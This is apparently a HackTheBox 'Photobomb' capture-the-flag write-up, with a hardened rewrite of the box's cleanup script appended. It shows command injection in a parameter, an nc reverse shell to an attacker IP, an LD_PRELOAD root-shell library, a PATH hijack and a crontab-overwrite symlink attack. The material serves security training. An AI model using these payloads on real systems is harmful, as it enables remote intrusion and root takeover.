# HackTheBox - Photobomb
## NMAP
```bash
Nmap scan report for 10.10.11.182
Host is up (0.093s latency).
Not shown: 54171 closed tcp ports (conn-refused), 11362 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
| 256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
|_ 256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
## PORT 80 (HTTP)
Visiting the web server redirects us to `photobomb.htb`, so we need to add it to the hosts file
It shows a link that takes us to `/printer`, which asks for credentials
We can find the credentials by checking the source of the site, which references a JS file containing them
With these, we can access the printer page
This page converts an image to either PNG or JPG at the dimensions displayed on the site
If we remove any of the POST parameters when downloading the file, it shows a stack trace revealing that the server is `ruby sinatra`
## Foothold
We can see from the stack trace that the `filetype` parameter is only checked for whether it contains `png` or `jpeg`, so we can try command injection there. I tried appending the `id` command with `;` but it didn't return any output
So I tried making a curl request to my Python server, which was successful
Using OpenBSD nc's reverse shell payload, URL-encoded:
```bash
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.72 2222 >/tmp/f
```
Stabilizing the shell with python3
## Privilege Escalation (root)
Running `sudo -l` shows that we can run `cleanup.sh` as root
## Method 1
The sudo rule allows us to set environment variables, which means we can set `LD_PRELOAD` to the path of a shared library that will be loaded before anything else. We can abuse this by compiling the following program into a shared library: on load it removes `LD_PRELOAD` from the environment, sets the real, effective and saved UIDs to 0 and spawns `bash -p`, giving us a root shell
```c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

/* Runs when the library is loaded (-nostartfiles makes _init our entry point). */
void _init() {
    unsetenv("LD_PRELOAD");      /* avoid re-triggering in child processes */
    setresuid(0, 0, 0);          /* sudo already runs us as root; pin all three UIDs */
    system("/bin/bash -p");      /* -p keeps the privileged UIDs */
}
```
```bash
gcc -fPIC -shared -nostartfiles -o ./load.so ./test.c
```
```bash
sudo LD_PRELOAD=/tmp/load.so /opt/cleanup.sh
```
## Method 2
Checking the script which we can run
```bash
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb
# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
/bin/cat log/photobomb.log > log/photobomb.log.old
/usr/bin/truncate -s0 log/photobomb.log
fi
# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
```
This script changes to `/home/wizard/photobomb`, where with `-s` it checks if `photobomb.log` exists and is empty, and with `! -L` it checks that the log file isn't a symlink (to block symlink attacks); it then copies the contents of photobomb.log into photobomb.log.old and clears the log file. Finally, `find` looks for all jpg files and makes root the owner of those images
Here `find` isn't being run through its absolute path, which means we can abuse it by placing a file named `find` in a directory we control that spawns bash for us, and then setting the `PATH` environment variable through sudo so that our file is found first (a PATH hijack)
```bash
sudo PATH=/tmp:$PATH /opt/cleanup.sh
```
## Method 3
Going back to the script, the if condition checks `photobomb.log` but not `photobomb.log.old`, so we can symlink the old log file to `/etc/crontab` and write a crontab entry into the original log file, which will overwrite the crontab file
So, symlinking the file with crontab:
```bash
ln -sf /etc/crontab photobomb.log.old
```
Now place a bash script that makes bash SUID, or place a reverse shell there:
```bash
#!/bin/bash
chmod +s /bin/bash
```
```bash
* * * * * root /tmp/shell.sh
```
Putting the crontab entry in the `photobomb.log` file: the script copies it over the old log file, which in turn overwrites the crontab file, making bash SUID. We can then spawn bash with `-p` to run it as the SUID owner, root
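As an added defensive illustration, not part of the original writeup or the box's own `cleanup.sh`, here is a hardened rewrite that closes the gaps used in Methods 2 and 3: `PATH` is pinned and `find` is called by absolute path, both `photobomb.log` and `photobomb.log.old` are rejected if they are symlinks, and the rotated copy is written to a temp file and renamed into place so a symlink raced in after the check is replaced rather than followed. The directory argument to `rotate_log` is an assumption added so the function can be exercised outside the box.

```bash
#!/bin/bash
# Added example: hardened rewrite of /opt/cleanup.sh (not the box's own script).
# Closes the gaps abused in Methods 2 and 3: relative `find` lookup (PATH hijack)
# and an unchecked photobomb.log.old (symlink to /etc/crontab).
set -eu
# Pin PATH so a PATH supplied through sudo cannot redirect command lookups.
export PATH=/usr/sbin:/usr/bin:/sbin:/bin
# Belt and braces alongside sudo's env_reset: drop loader overrides.
unset LD_PRELOAD LD_LIBRARY_PATH

# True only if $1 is missing or a regular file, and in no case a symlink.
is_safe_file() {
  [ ! -L "$1" ] && { [ ! -e "$1" ] || [ -f "$1" ]; }
}

# Rotate $1/log/photobomb.log into photobomb.log.old when it is non-empty
# ([ -s ] is true for size > 0). Refuses, changing nothing, if either path
# is a symlink. The directory argument is an assumption added for testing.
rotate_log() {
  local dir=$1 log="$1/log/photobomb.log" old="$1/log/photobomb.log.old"
  is_safe_file "$log" || { echo "refusing: $log is not a regular file" >&2; return 1; }
  is_safe_file "$old" || { echo "refusing: $old is not a regular file" >&2; return 1; }
  if [ -s "$log" ]; then
    # Write to a fresh temp file and rename it into place: rename(2) replaces
    # the directory entry, so a symlink raced in after the check is overwritten,
    # not followed (unlike `cat > photobomb.log.old`).
    local tmp
    tmp=$(mktemp "$dir/log/.photobomb.log.old.XXXXXX")
    cat -- "$log" > "$tmp"
    mv -f -- "$tmp" "$old"
    : > "$log"
  fi
}

# Absolute path for find; find does not follow symlinks by default, so only
# real files under source_images are chowned.
protect_originals() {
  /usr/bin/find "$1/source_images" -type f -name '*.jpg' -exec chown root:root -- {} +
}

# Only act on the real box layout and only as root (chown needs it).
if [ "$(id -u)" -eq 0 ] && [ -d /home/wizard/photobomb ]; then
  rotate_log /home/wizard/photobomb
  protect_originals /home/wizard/photobomb
fi
```

The log directory is still owned by the unprivileged user, so a check-then-act window on `photobomb.log` itself remains; moving the log under a root-owned directory, or handing rotation to logrotate so no sudo rule is needed at all, removes it.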
## References
- https://atom.hackstreetboys.ph/linux-privilege-escalation-environment-variables/
- https://medium.com/r3d-buck3t/overwriting-preload-libraries-to-gain-root-linux-privesc-77c87b5f3bf8
- https://book.hacktricks.xyz/linux-hardening/privilege-escalation